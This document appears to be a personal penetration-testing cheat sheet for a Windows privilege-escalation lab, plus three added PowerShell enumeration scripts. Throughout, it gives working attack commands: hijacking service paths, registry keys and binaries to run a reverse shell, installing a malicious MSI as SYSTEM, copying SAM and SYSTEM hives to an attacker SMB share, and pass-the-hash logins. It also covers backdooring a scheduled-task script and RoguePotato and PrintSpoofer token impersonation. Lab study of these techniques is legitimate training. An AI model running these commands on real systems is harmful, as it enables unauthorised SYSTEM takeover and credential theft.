Check out the following links:
- HTB Windows Priv Esc
- Win Priv Esc Examples
- Syntax for Tools
-------------------------------------------------------------------
Insecure Service Permissions
- note: every technique below assumes you have already generated a reverse shell executable (reverse.exe, e.g. with msfvenom), transferred it to the victim (C:\PrivEsc in these notes), and have a netcat listener ready on kali to catch the shell
- use accesschk.exe to check the current user's permissions on the "daclsvc" service
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
- if the user has SERVICE_CHANGE_CONFIG in the output, they can change what the service executes
- query the service config; note BINARY_PATH_NAME and SERVICE_START_NAME (LocalSystem is what makes this worth doing):
sc qc daclsvc
- modify the service config so the binary path points at your executable (the escaped inner quotes are required by sc):
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
- start the listener on kali, then start the service to catch the shell:
net start daclsvc
-------------------------------------------------------------------
Unquoted Service Path
- query the service; BINARY_PATH_NAME contains spaces but no quotes, so Windows tries C:\Program.exe, "C:\Program Files\Unquoted.exe", ... before the real binary
sc qc unquotedsvc
- using accesschk.exe, note whether a group you belong to is allowed to write to a directory along that path (look for FILE_ADD_FILE / W)
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
- copy your executable from earlier into the writable directory, named after the first word of the next path element (Common.exe here)
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
- start the listener, then start the service:
net start unquotedsvc
--------------------------------------------------------------------
Weak Registry Permissions
- query the service:
sc qc regsvc
- using accesschk.exe: the service's registry key is writable by NT AUTHORITY\INTERACTIVE, i.e. any user logged on locally (including over RDP)
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
- overwrite the ImagePath value so it points at the reverse shell executable
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
- start the listener, then start the service:
net start regsvc
---------------------------------------------------------------------
Insecure Service Executables
- query the service: it runs as LocalSystem (SERVICE_START_NAME)
sc qc filepermsvc
- using accesschk.exe: the service binary itself is writable by Everyone
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
- copy the reverse shell executable over filepermservice.exe (back up the original first if you will need to restore it):
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
- start the listener, then start the service:
net start filepermsvc
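The four service checks above are done one service at a time with accesschk. The following PowerShell script is an added example, not part of the original notes or of accesschk: run from the low-privileged shell, it walks every service on the host and reports the same four weaknesses (SERVICE_CHANGE_CONFIG granted to you, unquoted image path with a writable directory, writable binary, writable service registry key). It assumes only built-in cmdlets and sc.exe; service names and paths are whatever the host has, and nothing is modified.

```powershell
# Added example: enumerate services for the misconfigurations covered above.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Access-mask bits that let us change an object: WRITE_DATA/ADD_FILE/SET_VALUE (0x2),
# APPEND_DATA/ADD_SUBDIR/CREATE_SUB_KEY (0x4), DELETE, WRITE_DAC, WRITE_OWNER,
# GENERIC_ALL, GENERIC_WRITE. File and registry rights share these bit positions.
$writeMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

# SDDL abbreviations "sc sdshow" uses for the principals a low-privileged user is in.
$sddlAlias = @{ WD = 'S-1-1-0'; AU = 'S-1-5-11'; IU = 'S-1-5-4'; BU = 'S-1-5-32-545' }

function Test-WritableByMe {
    # $true if an Allow ACE for our user or one of our groups carries a write bit.
    # Deliberately simple: ignores Deny ACEs, so confirm hits with accesschk or by writing.
    param([string]$Path)   # file, directory, or registry path such as HKLM:\...
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        # FileSystemAccessRule exposes FileSystemRights, RegistryAccessRule exposes RegistryRights
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if ($rights -band $writeMask) { return $true }
    }
    return $false
}

function Test-CanChangeServiceConfig {
    # Parse the service DACL from "sc sdshow" (sc.exe explicitly: "sc" is Set-Content in PowerShell).
    # ACE = (type;flags;rights;;;trustee). In service SDDL the two-letter code DC is
    # SERVICE_CHANGE_CONFIG, WD/WO are WRITE_DAC/WRITE_OWNER (we could grant ourselves
    # anything), GA is generic all. Codes are checked in pairs to avoid boundary false hits.
    param([string]$Name)
    $sddl = (& sc.exe sdshow $Name 2>$null) -join ''
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]+)\)')) {
        $codes   = [regex]::Matches($m.Groups[1].Value, '..') | ForEach-Object { $_.Value }
        $trustee = $m.Groups[2].Value
        if ($sddlAlias.ContainsKey($trustee)) { $trustee = $sddlAlias[$trustee] }
        if ($mySids -contains $trustee -and ($codes | Where-Object { $_ -in 'DC','WD','WO','GA' })) { return $true }
    }
    return $false
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $path = $svc.PathName
    if (-not $path) { continue }
    # Separate the image path from its arguments: a quoted path ends at the closing
    # quote; otherwise take everything up to the first ".exe" (the unquoted case).
    if ($path.StartsWith('"')) {
        $end = $path.IndexOf('"', 1); if ($end -lt 0) { $end = $path.Length }
        $exe = $path.Substring(1, $end - 1); $unquoted = $false
    } else {
        $i = $path.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
        $exe = if ($i -ge 0) { $path.Substring(0, $i + 4) } else { $path.Split(' ')[0] }
        $unquoted = $exe.Contains(' ')
    }
    $issues = @()
    if (Test-CanChangeServiceConfig $svc.Name) { $issues += 'SERVICE_CHANGE_CONFIG' }
    if (Test-WritableByMe $exe)               { $issues += 'binary writable' }
    if ($unquoted) {
        # Windows tries each space-delimited prefix + ".exe" before the real binary
        # (C:\Program.exe, C:\Program Files\Unquoted.exe, ...); any prefix whose
        # parent directory we can write to is a hijack point.
        $parts = $exe.Split(' ')
        for ($n = 1; $n -lt $parts.Count; $n++) {
            $candidate = ($parts[0..($n - 1)] -join ' ') + '.exe'
            if (Test-WritableByMe (Split-Path $candidate -Parent)) { $issues += "unquoted path: drop $candidate" }
        }
    }
    if (Test-WritableByMe "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)") { $issues += 'registry key writable' }
    if ($issues.Count) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Image = $exe; Issues = ($issues -join '; ') }
    }
}
$findings | Format-Table -AutoSize -Wrap
```

Anything it lists with RunsAs = LocalSystem is a candidate for the corresponding technique above; a hit on a service running as your own account gains nothing. Because the ACL check ignores Deny entries, confirm each hit with accesschk before relying on it.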
----------------------------------------------------------------------
Registry - Autoruns
- query the Run key for programs started at every logon
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- using accesschk.exe: the autorun binary is writable by Everyone
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
- copy the reverse executable over the autorun program
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
- the payload runs in the context of whoever logs on next, so in the real world you have to wait for an admin to log in; in the lab, simulate it by logging in as admin over RDP with the listener running
------------------------------------------------------------------------
Registry - AlwaysInstallElevated
- query both hives; the technique only works if the value is 1 in BOTH
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- both keys set to 1 (0x1)
- on kali generate a reverse shell MSI (msfvenom with the msi output format)
- transfer it over to the windows box and start the listener
- install it; the Windows Installer runs the package as SYSTEM, so the shell comes back with SYSTEM privileges
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
------------------------------------------------------------------------
Passwords - registry
- the registry can be searched recursively for keys and values whose name or data contain the word "password"
reg query HKLM /f password /t REG_SZ /s
- for autologon creds (DefaultUserName / DefaultPassword under Winlogon)
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-----------------------------------------------------------------------
Passwords - Saved creds
- list credentials saved in Credential Manager
cmdkey /list
- if an admin credential is saved, runas can use it without you knowing the password (start the listener first)
runas /savecred /user:admin C:\PrivEsc\reverse.exe
-----------------------------------------------------------------------
Passwords - Security Account Manager (SAM)
- the live SAM and SYSTEM hives are locked, but backup copies may be readable (here under C:\Windows\Repair); remember you already have smbserver running on kali
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
- on kali use a tool to dump the hashes from the two files (SYSTEM holds the boot key needed to decrypt the SAM), e.g. creddump7's pwdump or impacket's secretsdump in local mode
----------------------------------------------------------------------
Passwords - Passing the Hash
- the NTLM hash alone is enough to authenticate over SMB, no cracking required (give the hash as LM:NT)
pth-winexe -U 'admin%hash' //10.10.0.46 cmd.exe
----------------------------------------------------------------------
Scheduled tasks
- view the contents of the script
type C:\DevTools\CleanUp.ps1
- it seems to run every minute under a privileged account; use accesschk.exe to check whether the current user can write to the file
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
- start the listener, then append a line to the script which runs your reverse.exe executable (a bare path on its own line is executed by PowerShell); the shell arrives on the task's next run
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
-----------------------------------------------------------------------
Insecure GUI Apps
- start an RDP session as the low-privileged user
- confirm paint is running with admin privileges (check the User Name column of the verbose tasklist output)
tasklist /V | findstr mspaint.exe
- exploit: in Paint choose File > Open, paste the following into the File name box and press Enter; cmd.exe starts with Paint's (admin) token
file://c:/windows/system32/cmd.exe
-----------------------------------------------------------------------
Startup apps
- using accesschk.exe: the Users group can write files to the all-users startup directory
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
- using cscript, run the CreateShortcut.vbs script, which creates a new shortcut to your reverse.exe in the startup directory (anything there runs at every interactive logon, as the user logging on)
cscript C:\PrivEsc\CreateShortcut.vbs
- set up the listener, then simulate an admin logon via RDP with the creds you found earlier
rdesktop -u admin 10.10.0.46
(a shell will appear on the listener once the admin desktop loads)
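The autorun, scheduled task and startup-folder sections all reduce to one question: can I write to something a more privileged principal will execute? The following PowerShell script is an added example, not part of the original notes; instead of reading ACLs it asks the kernel directly, opening each candidate file for write (an effective-access check that honours Deny ACEs and nested group membership) and dropping a throwaway probe file in each directory. It assumes only built-in cmdlets (Get-ScheduledTask needs Windows 8 / Server 2012 or later) and the standard Run key and Startup folder locations. Nothing is changed, but the probe file briefly exists on disk, so keep your rules of engagement in mind.

```powershell
# Added example: find writable persistence targets run by other principals.
function Test-CanWriteFile {
    param([string]$Path)
    try {
        $fs = [System.IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite')
        $fs.Close()
        return $true
    } catch [System.UnauthorizedAccessException] {
        return $false
    } catch {
        return $null   # file missing, or locked by a running process: cannot tell from here
    }
}

function Test-CanCreateIn {
    # Effective test for FILE_ADD_FILE on a directory: create and immediately delete a probe.
    param([string]$Dir)
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try { [System.IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; return $true }
    catch { return $false }
}

function Get-PathsFromCommand {
    # Pull executable/script paths out of a command line, quoted or not,
    # e.g. 'powershell -File "C:\DevTools\CleanUp.ps1"' -> C:\DevTools\CleanUp.ps1
    param([string]$Cmd)
    [regex]::Matches($Cmd, '"([^"]+?\.(?:exe|ps1|bat|cmd|vbs|dll))"|([A-Za-z]:\\[^\s"]+?\.(?:exe|ps1|bat|cmd|vbs|dll))', 'IgnoreCase') |
        ForEach-Object { if ($_.Groups[1].Success) { $_.Groups[1].Value } else { $_.Groups[2].Value } }
}

$me      = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$meShort = $me.Split('\')[-1]
$hits    = @()

# 1. Registry Run keys: every value runs at each interactive logon as the user logging on.
foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
                 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run') {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }) {
        foreach ($f in Get-PathsFromCommand ([string]$p.Value)) {
            $hits += [pscustomobject]@{ Source = "Run key: $($p.Name)"; RunsAs = 'next user to log on'; File = $f; Writable = Test-CanWriteFile $f }
        }
    }
}

# 2. Scheduled tasks not running as us (best-effort filter on the principal name):
#    the action binary and any script named in its arguments.
foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.Principal.UserId -and $_.Principal.UserId -notin $me, $meShort }) {
    foreach ($a in $t.Actions) {
        foreach ($f in Get-PathsFromCommand "$($a.Execute) $($a.Arguments)") {
            $hits += [pscustomobject]@{ Source = "Task: $($t.TaskPath)$($t.TaskName)"; RunsAs = $t.Principal.UserId; File = $f; Writable = Test-CanWriteFile $f }
        }
    }
}

# 3. All-users Startup folder: anything dropped here runs at every interactive logon.
$startup = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp'
$hits += [pscustomobject]@{ Source = 'Startup folder'; RunsAs = 'next user to log on'; File = $startup; Writable = Test-CanCreateIn $startup }

# Show confirmed ($true) and undetermined ($null) targets; $false is definitively not writable.
$hits | Where-Object { $_.Writable -ne $false } | Format-Table -AutoSize -Wrap
```

A $null in the Writable column usually means the target is held open by a running process (a live service binary, for instance); check it with accesschk, or wait for the process to exit, before deciding it is safe.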
-----------------------------------------------------------------------
Token Impersonation - Rogue Potato
- set up a socat redirector on kali, forwarding kali port 135 back to port 9999 on the windows box (RoguePotato makes the victim's DCOM/RPC connect to kali:135; socat bounces that connection to RoguePotato's own fake OXID resolver listening on 9999)
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.0.46:9999
- start a listener on kali
- to simulate a compromised service account (LOCAL SERVICE holds SeImpersonatePrivilege, which is what the exploit abuses), log in as admin over RDP with the cracked creds, launch cmd as admin and run reverse.exe as LOCAL SERVICE:
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- start another listener
- in the local service reverse shell run the Rogue Potato exploit (-r is the redirector, -l the local port socat forwards to) to trigger a second reverse shell, this time as SYSTEM
C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999
-----------------------------------------------------------------------
Token Impersonation - PrintSpoofer
- start a listener on kali
- log on via RDP as admin with the cracked creds
- launch cmd as admin and run reverse.exe as LOCAL SERVICE (again simulating a service account that holds SeImpersonatePrivilege):
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- start another kali listener
- in the local service reverse shell run the following (-i interacts with the new process in the current console; the Print Spooler service must be running):
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
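Both potato-style exploits above depend on the token you already hold, not on a bug you can find later, so it pays to check the prerequisites before uploading tooling. The following PowerShell function is an added example, not part of the original notes or of either exploit: it reports whether the current token carries SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (present is enough; the exploits enable a disabled privilege themselves), whether the Print Spooler is running (needed by PrintSpoofer only), and whether the kali redirector on TCP 135 is reachable (needed by RoguePotato, and only meaningful once socat is listening). It assumes built-in tools only; 10.10.10.10 is the kali address used in these notes.

```powershell
# Added example: prerequisite check for RoguePotato / PrintSpoofer from the current shell.
function Get-ImpersonationReadiness {
    param([string]$KaliHost = '10.10.10.10')   # assumed: the attacker box from these notes

    # whoami /priv prints "Name  Description  State" columns separated by runs of spaces;
    # keep the privilege name and the last column (Enabled / Disabled).
    $privs = whoami /priv | Where-Object { $_ -match '^Se\w+Privilege' } | ForEach-Object {
        $f = $_ -split '\s{2,}'
        [pscustomobject]@{ Name = $f[0]; State = $f[-1] }
    }
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
    $have   = @($privs | Where-Object { $wanted -contains $_.Name })

    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # Quiet mode returns a plain boolean; a false result here with socat already running
    # means egress to the redirector is blocked and RoguePotato will not complete.
    $redirector = Test-NetConnection -ComputerName $KaliHost -Port 135 -InformationLevel Quiet -WarningAction SilentlyContinue

    [pscustomobject]@{
        User                = (whoami)
        TokenPrivileges     = ($have | ForEach-Object { "$($_.Name)=$($_.State)" }) -join ', '
        PotatoFamilyViable  = ($have.Count -gt 0)
        SpoolerRunning      = [bool]($spooler -and $spooler.Status -eq 'Running')
        RedirectorReachable = [bool]$redirector
    }
}

Get-ImpersonationReadiness
```

Run it in the LOCAL SERVICE shell obtained via PSExec64 above: PotatoFamilyViable should be True there and False in the original low-privileged user shell, which is exactly why the notes bother with the service-account step first.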
-----------------------------------------------------------------------
Useful scripts:
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe